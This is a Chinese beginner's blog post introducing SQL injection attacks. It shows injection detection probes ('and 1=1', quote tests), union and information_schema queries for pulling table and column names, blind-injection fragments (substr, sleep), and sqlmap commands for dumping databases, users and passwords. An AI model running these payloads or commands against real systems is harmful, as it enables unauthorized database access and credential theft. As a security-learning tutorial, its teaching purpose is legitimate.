初试SQL注入攻击

最新推荐文章于 2024-05-28 17:10:36 发布
最新推荐文章于 2024-05-28 17:10:36 发布
阅读量181 收藏
点赞数 3
分类专栏: SQL注入学习 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43072923/article/details/115347425
版权

SQL注入——小白入门预备知识

什么是SQL注入攻击:

  • SQL注入(Sql Injection):是一种十分流行的脚本攻击,能严重危害数据库安全的攻击。其是将用户输入的数据作为恶意SQL语句注入的途径,拼接到数据库的SQL语句中,被当做SQL语句的一部分执行。

哪里能进行SQL注入呢?

  • 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入,如URL、用户输入栏、评论区等等。

SQL注入的分类:

1、带内(In-band)SQLi,也叫经典SQLi
2、推测SQL注入(盲注)
3、带外SQLi

(参考:https://blog.csdn.net/caiqiiqi/article/details/102987856)

检测是否存在SQL注入漏洞:

  • 若想要进行SQL注入攻击当然得先查看存不存在SQL注入漏洞,我们在输入框输入单引号’或者双引号",若返回错误则存在该漏洞(提示单引号或者双引号个数不匹配);也可以通过URL传入参数:and1=1和and 1=2来进行判断,若传入and 1=1正常,输入and1=2发返回错误则存在数字型SQL注入漏洞(逻辑判断1=1为真,1=2为假);同理输入and ‘1’='1’和and ‘1’='2’进行同样的操作,判断字符型SQL注入漏洞是否存在。

必须知道的SQL语句:

1=1,1=2(判断真假);
order by X;
database(),user(),version();
union select null,null,…();
length(database())>=1;
substr(database(),1,1)=‘a’;
sleep(1);
…等等(啥意思百度一下就知道)

Information_schema库的使用:

(详细请查看https://blog.csdn.net/lxy320826/article/details/101398841)

首先,table_schema,table_name,column_name分别是库名表名列名,这是比较常用的列名;group_concat()是一个返回组的连接的函数;
我们可以通过:

  1. union select group_concat(table_name) from information_schema.tables
    where table_schema=‘xxx’ #获得xxx数据库的表名
  2. union select group_concat(column_name) from
    information_schema.columns where table_schema=‘xxx’ #获得xxx数据库的列名

有了表名和列名对后续的操作就方便了,想查什么就查什么。

学习并使用工具来节省时间:

(安装教程:https://blog.csdn.net/cqs394235616/article/details/106283059)

如sqlmap,其中最常用也最基础的语句:
python sqlmap.py -u URL(如http://abc.com/xxx.php?id=1) #查找注入点;
python sqlmap.py -u URL --dbs #获取所有数据库
python sqlmap.py -u URL --/users/passwords/current-user/current-db#获取数据库所有用户/密码/当前网站数据库的用户名称/当前网站数据库的名称
python sqlmap.py -u URL -D xx --tables #获取数据库xx的所有表名
python sqlmap.py -u URL -D xx -T yy --columns #获取xx数据库yy表的所有字段
python sqlmap.py -u URL -D xx -T yy -C id,username,password --dump #同理指定库名表名字段,dump出指定字段信息

ccooll_快乐的抬锅哟
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
初试渗透:看我无痛学习攻击SQL
08-31
初试渗透:看我无痛学习攻击SQL 嘿嘿。。。很不错的哦
SQL注入分类
qq_29600105的博客
07-04 4251
SQL注入分类来源于Acunetix的官方网站,只是低级翻译以便参考。一、SQL注入类型(SQLi)SQL注入可以以多种方式使用,从而导致严重的问题。通过使用SQL注入攻击者可以绕过认证、访问、修改和删除数据库中的数据。在某些情况下,甚至可以使用SQL注入来执行操作系统上的命令,这可能会让攻击者升级到防火墙后的网络中更具破坏性的攻击SQL注入可以分为以下三个主要类别。(1)带内SQLi(In-...
SQL注入的分类
公众号shadow sock7
11-09 3250
SQL注入可以绕过认证,对数据进行读、改、删。某些情况下可能造成执行命令的效果。 作为一种攻击方式,其本质原因在于后端接收了用户输入,并将其拼接到SQL语句中,造成了数据和指令的混淆。将本该是数据的地方注入了额外的指令,实现了攻击的效果。 SQL主要可以分为三类: 1、带内(In-band)SQLi,也叫经典SQLi 顾名思义,带内的意思就是攻击者可以在同一个信道里进行攻击,并且拿到结果。 最常见...
sql injection 类型总结
qq_24196029的博客
08-16 1330
前言(废话):本人觉得网上对于SQL类型的分析其实有点混乱(特别是中文网站,误导人),后来我发现其实大家都是根据sqlmap上给出的类型来划分的( --technique=BEUSTQ (Boolean, Error, Union, Stacked, Time, Query Inline) 从实际的理解上来说,这样划分是难以理解的,sqlmap的BEUSTQ是它的注入方式,和类型其实没有什么
有效防止sql注入的方法_sql注入有效负载列表
weixin_26747751的博客
09-11 409
有效防止sql注入的方法In this section, we’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to pr...
SQL注入攻击详解
谢世杰的博客
03-03 7922
一、什么是SQL注入 SQL 注入(SQLi)是一种注入攻击,,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库中的记录。 SQL 注...
初试weka数据挖掘
03-02
数据挖掘、机器学习这些字眼,在一些人看来,是门槛很高的东西。诚然,如果做算法实现甚至算法优化,确实需要很多背景知识。但事实是,绝大多数数据挖掘工程师不需要去做算法层面的东西。他们的精力,集中在特征提取...
应聘人员初试测评表.doc
06-17
应聘人员初试测评表 评价人姓名: 职务: 面试时间: 应聘人姓名: 性别: 年龄: 编号: 应聘职位: 原单位: 评价方向 评价要素 评价等级 1(差) 2(较差) 3(一般) 4(较好) 5(好) 个人基本素质 评价 1、...
初试基本情况评价表.doc
06-17
初试基本情况评价表 姓名: 考虑部门: 应聘职位: 1.家庭背景 差 1 2 3 4 5 好 好:父母是干部、教师、高学历者等。 差:父母教育程度低、离异等。 2.学历与专业 差 1 2 3 4 5 好 好:学历高,专业与应聘...
SQLI类型
leoriclee的博客
07-21 856
根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inband, inference(推理) 和out-of-band。 Inband技术使用攻击者和有漏洞的Web应用程序之间现有的渠道来提取数据。通常该通道是标准的Web服务器响应。它的成员union技术使用现有的web页面输出恶意SQL查询的执行结果,而error-based技术则引发特定的恶意SQL查询的执行结果的DBMS的错误消息。 相反的,在Inference技术中,攻击者通过应用程序表现的差异来推断数据的值。Inference技术能够逐位
SQL注入(2)——各种注入
realmels的博客
04-24 922
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。 这里配合先前搭建好的sqli-lab进行测试 报错注入 报错注入主要是通过使数据库报错,从而获取信息。 这里报错函数主要是updatexml、ex.
mysql支持的存储引擎有哪些
JustinMars的博客
05-28 120
选择存储引擎时应根据具体应用场景和需求来决定。例如: - 如果需要事务和高数据完整性,选择InnoDB。 - 如果读操作频繁且不需要事务,选择MyISAM。 - 如果需要快速的临时数据存储,选择MEMORY。 - 如果需要数据压缩和存档,选择ARCHIVE。
mysql实战——mysql主从复制管理
最新发布
zyjzyjjyzjyz的博客
05-28 597
一、常见的管理操作1、查看主库状态2、查看从库复制的状态3、在主库上查看从库ip和端口信息。
【Java面试】四、MySQL篇(上)
llg___的博客
05-27 969
如果去维护一个类似二叉树的结构,再查age=45的数据,则直接从根节点开始⇒ 45 > 36,去右侧 ⇒ 45 < 48 ⇒去左侧 ⇒ 查找完毕,如此,查找效率提升,这即索引的思想。是覆盖索引,虽然select * ,但其where是根据id过滤的,即用的是主键索引、聚簇索引,索引的叶子节点存了整行数据,需要返回的字段,在索引中能够全部找到。给name字段加了非聚簇索引,因此,执行如上SQL,先根据name的非聚簇索引的B+树 ⇒ A小于L,走左边,到G和J,再走左边,找到Arm ⇒ 因为是。
mysql存储地理信息的方法
m0_72958694的博客
05-27 488
mysql存储地理信息的方法详细教程。
MySQL导入SQL脚本---超详细介绍
qq_38382365的博客
05-27 290
3.执行mysql -uroot -p123456 --default-character-set=utf8命令。需要注意的是--default-character-set=utf8,要不然可能会有报错。2.在mysql安装目录下cmd进入小黑窗。1.新建xxx数据库,字符集选对。执行完上面的命令等待结束就可以了。
java医院管理系统源码(springboot+vue+mysql)
sinat_26552841的博客
05-28 435
的主要使用者分为管理员功能,个人中心,医生管理,护士管理,病床类别管理,药品类别管理,科室信息管理,内部论坛管理,系统管理。医生功能,个人中心,病床管理,药房管理,病人信息管理,药方信息管理。护士功能修改个人中心,查看病床管理,查看药房管理,查看病人信息管理,查看药方信息管理。💕💕作者:风歌(风定落花生,歌声逐流水的风歌)💕💕个人简介:混迹在java圈十年有余,擅长Java、微信小程序、Python、Android等,大家有这一块的问题可以一起交流!💕💕各类成品java毕设。
MySQL 内存缓冲池 InnoDB Buffer Pool Sizes 深度解析
良月柒
05-27 739
InnoDB Buffer Pool是InnoDB存储引擎用于缓存表和索引数据的主要内存结构。它的主要功能是将经常访问的数据页保存在内存中,从而减少磁盘I/O操作,提高数据库的读写性能。InnoDB Buffer Pool是MySQL中提升性能的关键组件之一。合理配置和优化Buffer Pool大小及实例数量,可以显著提高数据库的读写性能。在实际应用中,应根据系统的内存资源、数据量和并发访问情况,动态调整Buffer Pool配置,并通过监控工具持续优化数据库性能。
MySQL精通之路】全文搜索(5)-限制
Anakki的博客
05-27 486
因此,全文搜索只返回提交的数据。MATCH()列列表必须与表的某些FULLTEXT索引定义中的列列表完全匹配,除非此MATCH(在MyISAM表上处于BOOLEAN模式。提供了一个支持中文、日语和韩语(CJK)的基于字符的ngram全文解析器,以及一个支持日语的基于单词的MeCab解析器插件,用于InnoDB和MyISAM表。尽管支持在单个表中使用多个字符集,但FULLTEXT索引中的所有列都必须使用相同的字符集和排序规则。因此,内置的全文解析器无法确定这些语言和其他此类语言中的单词的开头和结尾。
androidstudio小白初试代码
04-27
如果你是一名安卓开发的小白,那么初试代码可能会让你觉得很吃力。不过,这并不是什么难事,只需要一些必要的步骤和一些基本知识。 第一步,下载并安装AndroidStudio,打开并创建新项目。现在,你可以选择创建一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值